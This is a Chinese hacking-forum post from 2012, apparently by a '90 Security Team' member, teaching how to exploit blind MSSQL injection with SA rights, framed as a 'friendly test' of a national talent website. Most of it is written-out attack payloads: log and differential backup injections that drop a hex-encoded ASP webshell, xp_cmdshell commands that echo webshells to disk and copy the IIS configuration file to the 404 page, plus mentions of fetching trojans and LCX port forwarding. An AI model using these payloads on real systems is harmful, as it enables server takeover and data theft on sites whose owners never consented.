找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 sa权限的教程.
返回列表 发新帖
查看: 3127|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
4 n  n+ w2 G3 p' o2 W* C( l( M
, [1 j4 j' |# h- Z6 j& R
. d8 m+ D4 k' W! {3 _7 L                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
* ?  \2 }# n. q/ I
( C/ c- L6 K  X: u                                                                 # U  b: V* X8 D' S- j$ S
                                                                 ; c- o  l! U8 S( s$ x8 ~- |
                                                                  论坛: http://www.90team.net/: [+ E) M: O( u/ _, {8 V

# H& _2 c) M! n  a; U. k; i9 i" m: H* g9 C! S% c

! C6 u, m3 \, v0 a( `友情检测国家人才网/ M, E) L9 C; `1 f0 h) S& q

! A, \* Q: t* v3 ^4 {5 R% }
0 n( m  [# ~. a0 ?内容:MSSQL注入SA权限不显错模式下的入侵
3 h& k: X1 k- z$ S) \3 ^: h$ r* W1 \4 K- h9 ?4 E. u( l

% X: N$ ^4 ?% d' i  k* y7 @一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。- H6 P1 M* K; K0 G" c- j
& V9 Z. h: s3 Q2 P, Y/ V, w
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
' Q, k  P! [2 ~2 a* A; P3 y, `6 k. ?! W, P8 A! J

8 G" c/ X, W( w% N! Q. J! R这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。; t) Q) z& Y2 |* y! A$ R, h2 f
( o5 {4 p. {. d
思路:
5 {+ j- `% Y# |9 J: c# D
+ [. n6 V& s( H首先:9 y2 c4 Q6 B9 j+ ~  Y4 y: Z! D  t4 v

, l% W& a9 {7 h9 X: Y7 _通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
  r3 [4 Q6 N4 k, R- P! ~$ ~2 Q6 P( G- ^2 _
1.日志备份获得Webshell
% M- x% w" e7 G! C3 `; ]: M* W3 S3 B: a. _- J
2.数据库差异备份获得Webshell
) H1 t# {' m$ x0 Q( I
/ s6 s6 \' J; i. |2 O4.直接下载免杀远控木马。
- F1 ?& v0 c5 \+ ^/ ?7 x# \+ n# b8 J. o
5.直接下载LCX将服务器端口转发出来6 S+ w; \1 g1 E! j$ a
) \6 y! h1 `) |0 A2 v( p
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
# W& F- L- N1 `- q
; E+ S( c; V, K& U5 \5 |1 B% P! R- G
' P) g; V' u) I+ z) _' F
4 V9 c4 u1 B2 B7 X/ W- ~# ^. k9 z在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
6 H- H( y# I1 I7 `7 n, [4 H* F2 U, J, t. x' `
我直接演示后面一个方法% p1 G. X& D, v) p4 G0 K+ z

  y  M* o" ~% R, K7 T+ X9 b0 V4 X5 ?9 @' c5 ?
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL " v# Z. `. _* i/ T0 O

5 H" U' e1 c& c9 ?2 A! \& j8 a" m- m# j
8 x' c3 m4 ]2 ^, D. r
7 E' m/ }1 f! n% H9 B! p
◆日志备份:8 R, Q7 s' w' k% u$ M
# O! W8 H6 z& N$ ]0 m5 ]7 K* V

  S3 l* b9 f9 h) C7 g5 o; L6 {9 Z- ~1. 进行初始备份2 i& x& \7 p. }7 A5 e3 \. s
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
  f( `" e' `, V: |8 K6 d3 L+ U7 S# B7 S
2. 插入数据8 |, |! F, X7 F
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--5 g3 U; t6 t( Q7 J; E. C

+ N% F" P1 ~" @" }! d0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>: v- J- ^" i/ O  F3 ]4 C
  9 m3 x5 ?/ v7 K9 S4 @6 n) O3 s
3. 备份并获得文件,删除临时表
7 C% J' B+ [0 @+ y) c/ \9 }" c9 E;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--) T  C9 W# i/ I; a8 B% _
4 G8 ^9 e( p6 P! Y/ t- P6 d, U

8 q3 O* d' H+ y- ^, p5 u/ L4 e  o" L$ W, @( P
◆数据库差异备份
% ]( @: S' ~7 N0 A$ U1 P) p. E. z* h2 G3 X! S0 j
(1. 进行差异备份准备工作
, j, f  l- y1 I$ z; `0 h) n% B" \5 x0 [( t7 ~
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--0 g8 C  p, \6 }- C
  L* I/ y8 L( o- K2 a5 a
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码$ E6 {8 {# I9 d9 a/ E

$ i" {( S3 t7 D8 K; Q* Y* \$ ?$ E: T1 K( }, K8 D* k6 c  }" T! J
(2. 将数据写入到数据库. ]7 b" O# v, |8 j4 \
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
* K6 ?; a- m# X+ T7 @/ G
+ D( |6 F. K+ v) X9 d0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
$ G3 g) g! B% z( o# Q4 J7 }* M. L0 h% z- t- z1 d
3. 备份数据库并清理临时文件) V9 ]1 v& ~, P+ ]( _

8 ?+ F  Z+ W- ?* s9 H& v% m4 o;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--4 j5 O' C! q1 l2 v
; y1 F3 r0 y) ~  G
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
* s4 ~7 O) C8 o& F9 A3 x4 p( l6 O0 J
7 M- A5 c* d" Y+ w# g
6 M( L9 z1 M: E$ U; f5 {' b6 y5 `. Z% R, v- Y
用^转义字符来写ASP(一句话木马)文件的方法:   % h) T$ V! D% _& [( j
% R# `( l* H# }; _' @
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--; ^$ y# l! z$ o
' P, w/ \3 j+ ~* }1 a- ~
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp 5 @4 b) u9 R# }: w2 T

/ d) r* l, R. |8 n- T* G: h  C读取IIS配置信息获取web路径5 ~7 k5 N9 t+ A8 B! o. v+ o

8 \  M* p% l5 Q     
  j+ b$ [) T) L     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--- j, \/ a0 W0 R
# Q! h% F/ G3 R* I
执行命令4 H9 l" G8 v9 ^- ]
     
, N4 g4 b) a6 r# V& s% }: S6 p. r     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
( f5 X2 g, t" ^$ p$ F8 P9 l' k- I, v: F7 q

- ^% \+ D7 x) ~" @2 u4 }) Z0 i- S2 R/ M

- p% Q5 m! V4 ]2 m: I4 S" Z  H9 P
. C/ Z: l2 i1 y6 B" U# x/ U. C6 v/ f6 c% I; s, h8 u3 ?9 p
% x1 G; e. J% O' G

& M4 A6 K2 }4 A2 s1 u, ^: f  E. [/ ?4 r8 t% U9 m: c
$ [  H$ B" ?. b9 O+ H4 M

3 `9 G6 h# E0 a2 C
% I# U  A' b. E9 x8 q9 T5 P0 v, d) p; l5 g
, [, L5 t8 d* L
, p6 U4 k/ f! g3 n& O

: z7 P) K$ `4 B9 }1 ^! G; r  T/ G4 a/ \

' H7 I5 ?, I1 W4 d8 w6 A; Y, E0 L  c8 A

! u7 Z: ?# C& v" L
( A4 _5 |. h  h) T( Z! G( V9 C: J7 k6 T: Q& l; J+ ?9 c) Y

: p' Y4 {8 u4 p# `3 T, W- t/ t% C" ^- P( ^3 t1 a$ |
0 E7 `, c( T. @. t! {# ~, w

; q! q7 u- j8 C. i* Q/ Q2 k. A/ W2 @: Y! }0 G% B4 f/ r: D; X

0 R9 u* v+ |; H. w: y( I  B/ c3 `3 y
' M7 e/ c. ~, o4 J1 D. ^
- @$ n% R& ?$ q! V  c; g/ }; F: O5 U5 n* s- ~, s8 ]1 A
2 g/ B/ x. A  t: U- e' v% {$ t( U6 A
( C/ G2 c" k. x! E* z  l

6 t8 i, V6 ?# x2 ~9 u
9 ]/ `- R8 b# _% v
/ i3 p9 h: k- d, Z8 h: {2 r5 X- b: ?

$ N- o( {4 L/ d% h3 {# n
0 D# C0 u8 n- h4 G0 b0 A( C0 n' S8 a" w; r+ j

: f) V7 v/ R5 C$ L. K' @( I
' e; D. G2 {7 k8 I$ J1 Y& U, ~- q. E7 j% T# A& g
: b! w; K. r) i' K# [  C
: p  {' ?7 T' p' R6 E7 X$ d: O$ ?
2 g0 K. C& }- {- T
8 h) N' g0 M% \
" f) ?/ ]; h+ X* X& B  o. B$ }
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表